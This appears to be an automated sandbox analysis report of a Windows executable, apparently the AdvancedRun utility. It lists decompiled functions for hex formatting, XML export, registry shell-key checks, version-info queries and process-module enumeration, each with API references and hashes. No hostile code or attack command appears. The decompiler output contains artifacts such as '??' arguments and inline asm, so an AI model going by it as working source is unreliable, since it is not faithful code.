                                                                                      • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                      • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 71%
                                                                                      			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
                                                                                      				void _v514;
                                                                                      				long _v516;
                                                                                      				wchar_t* _t34;
                                                                                      				signed int _t35;
                                                                                      				void* _t36;
                                                                                      				void* _t37;
                                                                                      
                                                                                      				_t34 = __edi;
                                                                                      				_v516 = _v516 & 0x00000000;
                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                      				 *__edi =  *__edi & 0x00000000;
                                                                                      				_t37 = _t36 + 0xc;
                                                                                      				_t35 = 0;
                                                                                      				do {
                                                                                      					_push( *(_t35 + _a4) & 0x000000ff);
                                                                                      					_push(L"%2.2X");
                                                                                      					_push(0xff);
                                                                                      					_push( &_v516);
                                                                                      					L0040B1EC();
                                                                                      					_t37 = _t37 + 0x10;
                                                                                      					if(_t35 > 0) {
                                                                                      						wcscat(_t34, " ");
                                                                                      					}
                                                                                      					if(_a8 > 0) {
                                                                                      						asm("cdq");
                                                                                      						if(_t35 % _a8 == 0) {
                                                                                      							wcscat(_t34, L"  ");
                                                                                      						}
                                                                                      					}
                                                                                      					wcscat(_t34,  &_v516);
                                                                                      					_t35 = _t35 + 1;
                                                                                      				} while (_t35 < 0x80);
                                                                                      				return _t34;
                                                                                      			}

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscat$_snwprintfmemset
                                                                                      • String ID: %2.2X
                                                                                      • API String ID: 2521778956-791839006
                                                                                      • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                      • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                      • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 42%
                                                                                      			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
                                                                                      				void _v514;
                                                                                      				char _v516;
                                                                                      				void _v1026;
                                                                                      				char _v1028;
                                                                                      				void* __esi;
                                                                                      				intOrPtr* _t16;
                                                                                      				void* _t19;
                                                                                      				intOrPtr* _t29;
                                                                                      				char* _t31;
                                                                                      
                                                                                      				_t29 = __ecx;
                                                                                      				_v516 = 0;
                                                                                      				memset( &_v514, 0, 0x1fc);
                                                                                      				_v1028 = 0;
                                                                                      				memset( &_v1026, 0, 0x1fc);
                                                                                      				_t16 = _t29;
                                                                                      				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
                                                                                      					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
                                                                                      				} else {
                                                                                      					_push(L"<?xml version=\"1.0\" ?>\r\n");
                                                                                      				}
                                                                                      				E00407343(_t16);
                                                                                      				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
                                                                                      				_t31 =  &_v516;
                                                                                      				E00407250(_t31, _t19);
                                                                                      				_push(_t31);
                                                                                      				_push(L"<%s>\r\n");
                                                                                      				_push(0xff);
                                                                                      				_push( &_v1028);
                                                                                      				L0040B1EC();
                                                                                      				return E00407343(_t29, _a4,  &_v1028);
                                                                                      			}

                                                                                      APIs
                                                                                      Strings
                                                                                      • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                      • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                      • <%s>, xrefs: 00407DF3
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf
                                                                                      • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                      • API String ID: 3473751417-2880344631
                                                                                      • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                      • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                      • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 70%
                                                                                      			E00403B3C(intOrPtr _a4) {
                                                                                      				void _v526;
                                                                                      				char _v528;
                                                                                      				void _v2574;
                                                                                      				char _v2576;
                                                                                      				void* __edi;
                                                                                      				intOrPtr _t29;
                                                                                      
                                                                                      				_v2576 = 0;
                                                                                      				memset( &_v2574, 0, 0x7fe);
                                                                                      				_v528 = 0;
                                                                                      				memset( &_v526, 0, 0x208);
                                                                                      				E00404AD9( &_v528);
                                                                                      				_push( &_v528);
                                                                                      				_push(L"\"%s\" /EXEFilename \"%%1\"");
                                                                                      				_push(0x3ff);
                                                                                      				_push( &_v2576);
                                                                                      				L0040B1EC();
                                                                                      				_t37 = _a4 + 0xa68;
                                                                                      				E00404923(0x104, _a4 + 0xa68, L"exefile");
                                                                                      				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
                                                                                      				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
                                                                                      				_t29 = E0040467A(_t37);
                                                                                      				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
                                                                                      				return _t29;
                                                                                      			}










                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00403B5D
                                                                                      • memset.MSVCRT ref: 00403B76
                                                                                        • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                      • _snwprintf.MSVCRT ref: 00403B9F
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                        • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                        • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                        • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                      • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                      • API String ID: 1832587304-479876776
                                                                                      • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                      • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                      • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
                                                                                      				void* _v8;
                                                                                      				int _v12;
                                                                                      				short _v524;
                                                                                      				char _v1036;
                                                                                      				void* __edi;
                                                                                      
                                                                                      				wcscpy( &_v524, L"\\StringFileInfo\\");
                                                                                      				wcscat( &_v524, _a8);
                                                                                      				wcscat( &_v524, "\\");
                                                                                      				wcscat( &_v524, _a12);
                                                                                      				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
                                                                                      					return 0;
                                                                                      				}
                                                                                      				_t34 =  &_v1036;
                                                                                      				E00404923(0xff,  &_v1036, _v8);
                                                                                      				E004049A2(_t34, __esi);
                                                                                      				return 1;
                                                                                      			}









                                                                                      APIs
                                                                                      • wcscpy.MSVCRT ref: 0040AFD3
                                                                                      • wcscat.MSVCRT ref: 0040AFE2
                                                                                      • wcscat.MSVCRT ref: 0040AFF3
                                                                                      • wcscat.MSVCRT ref: 0040B002
                                                                                      • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                        • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                        • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                        • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                        • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                      • String ID: \StringFileInfo\
                                                                                      • API String ID: 393120378-2245444037
                                                                                      • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                      • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                      • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintfwcscpy
                                                                                      • String ID: dialog_%d$general$menu_%d$strings
                                                                                      • API String ID: 999028693-502967061
                                                                                      • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                      • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                      • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 35%
                                                                                      			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
                                                                                      				void* _v0;
                                                                                      				intOrPtr _v4;
                                                                                      				intOrPtr _v8;
                                                                                      				unsigned int _v12;
                                                                                      				void* _v16;
                                                                                      				char _v20;
                                                                                      				char _v24;
                                                                                      				intOrPtr _v32;
                                                                                      				intOrPtr _v36;
                                                                                      				intOrPtr _v44;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				intOrPtr _t58;
                                                                                      				void* _t59;
                                                                                      				void* _t72;
                                                                                      				intOrPtr _t78;
                                                                                      				void _t89;
                                                                                      				signed int _t90;
                                                                                      				int _t98;
                                                                                      				signed int _t105;
                                                                                      				signed int _t106;
                                                                                      
                                                                                      				_t106 = _t105 & 0xfffffff8;
                                                                                      				E0040B550(0x8874, __ecx);
                                                                                      				_t98 = 0;
                                                                                      				_a8 = 0;
                                                                                      				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
                                                                                      					if( *0x4101b8 != _t98) {
                                                                                      						_t89 = _a4;
                                                                                      						_t58 =  *0x40f83c(8, _t89);
                                                                                      						_v8 = _t58;
                                                                                      						if(_t58 != 0xffffffff) {
                                                                                      							_v0 = 1;
                                                                                      							_a560 = 0x428;
                                                                                      							_t59 =  *0x40f834(_t58,  &_a560);
                                                                                      							while(_t59 != 0) {
                                                                                      								memset( &_a8, _t98, 0x21c);
                                                                                      								_a12 = _a580;
                                                                                      								_a8 = _t89;
                                                                                      								wcscpy( &_a16,  &_a1096);
                                                                                      								_a540 = _a576;
                                                                                      								_t106 = _t106 + 0x14;
                                                                                      								_a544 = _a572;
                                                                                      								_a552 = 0x428;
                                                                                      								if(E00409510(_a8,  &_a8) != 0) {
                                                                                      									_t59 =  *0x40f830(_v16,  &_a552);
                                                                                      									continue;
                                                                                      								}
                                                                                      								goto L18;
                                                                                      							}
                                                                                      							goto L18;
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_t72 = OpenProcess(0x410, 0, _a4);
                                                                                      					_v0 = _t72;
                                                                                      					if(_t72 != 0) {
                                                                                      						_push( &_a4);
                                                                                      						_push(0x8000);
                                                                                      						_push( &_a2160);
                                                                                      						_push(_t72);
                                                                                      						if( *0x40f840() != 0) {
                                                                                      							_t6 =  &_v12;
                                                                                      							 *_t6 = _v12 >> 2;
                                                                                      							_v8 = 1;
                                                                                      							_t90 = 0;
                                                                                      							if( *_t6 != 0) {
                                                                                      								while(1) {
                                                                                      									_a1616 = _t98;
                                                                                      									memset( &_a1618, _t98, 0x208);
                                                                                      									memset( &_a8, _t98, 0x21c);
                                                                                      									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
                                                                                      									_t106 = _t106 + 0x18;
                                                                                      									_a8 = _a4;
                                                                                      									_a12 = _t78;
                                                                                      									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
                                                                                      									E0040920A( &_v0,  &_a1600);
                                                                                      									_push(0xc);
                                                                                      									_push( &_v20);
                                                                                      									_push(_v4);
                                                                                      									_push(_v32);
                                                                                      									if( *0x40f844() != 0) {
                                                                                      										_a508 = _v32;
                                                                                      										_a512 = _v36;
                                                                                      									}
                                                                                      									if(E00409510(_a8,  &_v24) == 0) {
                                                                                      										goto L18;
                                                                                      									}
                                                                                      									_t90 = _t90 + 1;
                                                                                      									if(_t90 < _v44) {
                                                                                      										_t98 = 0;
                                                                                      										continue;
                                                                                      									} else {
                                                                                      									}
                                                                                      									goto L18;
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      						L18:
                                                                                      						CloseHandle(_v16);
                                                                                      					}
                                                                                      				}
                                                                                      				return _a8;
                                                                                      			}

























                                                                                      APIs
                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                      • memset.MSVCRT ref: 0040938D
                                                                                      • memset.MSVCRT ref: 0040939D
                                                                                        • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                      • memset.MSVCRT ref: 00409488
                                                                                      • wcscpy.MSVCRT ref: 004094A9
                                                                                      • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                      • String ID:
                                                                                      • API String ID: 3300951397-0
                                                                                      • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                      • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                      • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                      • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 44%
                                                                                      			E00402EC8(void* __ebx) {
                                                                                      				struct tagRECT _v20;
                                                                                      				struct tagPAINTSTRUCT _v84;
                                                                                      
                                                                                      				GetClientRect( *(__ebx + 0x10),  &_v20);
                                                                                      				_v20.left = _v20.right - GetSystemMetrics(0x15);
                                                                                      				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
                                                                                      				asm("movsd");
                                                                                      				asm("movsd");
                                                                                      				asm("movsd");
                                                                                      				asm("movsd");
                                                                                      				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
                                                                                      				return EndPaint( *(__ebx + 0x10),  &_v84);
                                                                                      			}






                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                      • String ID:
                                                                                      • API String ID: 19018683-0
                                                                                      • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                      • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                      • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                      • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 50%
                                                                                      			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
                                                                                      				void _v514;
                                                                                      				signed short _v516;
                                                                                      				signed short* _t34;
                                                                                      				signed int _t37;
                                                                                      				void* _t40;
                                                                                      				signed short* _t44;
                                                                                      				void* _t46;
                                                                                      
                                                                                      				_t40 = __edi;
                                                                                      				E00407343(__edi, _a4, L"<item>\r\n");
                                                                                      				_t37 = 0;
                                                                                      				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
                                                                                      					do {
                                                                                      						_v516 = _v516 & 0x00000000;
                                                                                      						memset( &_v514, 0, 0x1fc);
                                                                                      						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
                                                                                      						_t44 =  &_v516;
                                                                                      						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
                                                                                      						_t34 = _t44;
                                                                                      						_push(_t34);
                                                                                      						_push( *((intOrPtr*)(__edi + 0x64)));
                                                                                      						_push(_t34);
                                                                                      						_push(L"<%s>%s</%s>\r\n");
                                                                                      						_push(0x2000);
                                                                                      						_push( *((intOrPtr*)(__edi + 0x68)));
                                                                                      						L0040B1EC();
                                                                                      						_t46 = _t46 + 0x24;
                                                                                      						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
                                                                                      						_t37 = _t37 + 1;
                                                                                      					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
                                                                                      				}
                                                                                      				return E00407343(_t40, _a4, L"</item>\r\n");
                                                                                      			}











                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004079DB
                                                                                        • Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E
                                                                                        • Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
                                                                                        • Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288
                                                                                      • _snwprintf.MSVCRT ref: 00407A25
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                                                      • String ID: <%s>%s</%s>$</item>$<item>
                                                                                      • API String ID: 1775345501-2769808009
                                                                                      • Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                      • Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
                                                                                      • Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
                                                                                      • Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 64%
                                                                                      			E0040467A(void* __edi) {
                                                                                      				signed int _v8;
                                                                                      				void* _v12;
                                                                                      				void* _v16;
                                                                                      				void _v2062;
                                                                                      				short _v2064;
                                                                                      				int _t16;
                                                                                      
                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                      				_t16 = E004043F8( &_v12, 0x20019);
                                                                                      				if(_t16 == 0) {
                                                                                      					_v2064 = _v2064 & _t16;
                                                                                      					memset( &_v2062, _t16, 0x7fe);
                                                                                      					_push(__edi + 0x20a);
                                                                                      					_push(L"%s\\shell\\%s");
                                                                                      					_push(0x3ff);
                                                                                      					_push( &_v2064);
                                                                                      					L0040B1EC();
                                                                                      					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
                                                                                      						_v8 = 1;
                                                                                      						RegCloseKey(_v16);
                                                                                      					}
                                                                                      				}
                                                                                      				return _v8;
                                                                                      			}










                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 004046AF
                                                                                      • _snwprintf.MSVCRT ref: 004046CD
                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: CloseOpen_snwprintfmemset
                                                                                      • String ID: %s\shell\%s
                                                                                      • API String ID: 1458959524-3196117466
                                                                                      • Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                      • Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
                                                                                      • Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
                                                                                      • Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 16%
                                                                                      			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
                                                                                      				signed short _v131076;
                                                                                      
                                                                                      				_t25 = __esi;
                                                                                      				E0040B550(0x20000, __ecx);
                                                                                      				if(_a4 == 0) {
                                                                                      					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
                                                                                      				} else {
                                                                                      					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
                                                                                      						_push(_a24);
                                                                                      					} else {
                                                                                      						_v131076 = _v131076 & 0x00000000;
                                                                                      						_push(__esi);
                                                                                      						_push(L"\"%s\"");
                                                                                      						_push(0xfffe);
                                                                                      						_push( &_v131076);
                                                                                      						L0040B1EC();
                                                                                      						_push(_a24);
                                                                                      						_push( &_v131076);
                                                                                      					}
                                                                                      					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
                                                                                      				}
                                                                                      			}





                                                                                      APIs
                                                                                      • wcschr.MSVCRT ref: 00409D79
                                                                                      • _snwprintf.MSVCRT ref: 00409D9E
                                                                                      • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
                                                                                      • GetPrivateProfileStringW.KERNEL32 ref: 00409DD4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.243548923.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000006.00000002.243544310.0000000000400000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243561400.000000000040C000.00000002.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243569169.000000000040F000.00000004.00020000.sdmp
                                                                                      • Associated: 00000006.00000002.243575155.000000000041D000.00000002.00020000.sdmp
                                                                                      Similarity
                                                                                      • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                      • String ID: "%s"
                                                                                      • API String ID: 1343145685-3297466227
                                                                                      • Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
                                                                                      • Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
                                                                                      • Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 38%
                                                                                      			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
                                                                                      				char _v2052;
                                                                                      				short _v4100;
                                                                                      				void* __edi;
                                                                                      				long _t15;
                                                                                      				long _t16;
                                                                                      
                                                                                      				_t15 = __ecx;
                                                                                      				E0040B550(0x1000, __ecx);
                                                                                      				_t16 = _t15;
                                                                                      				if(_t16 == 0) {
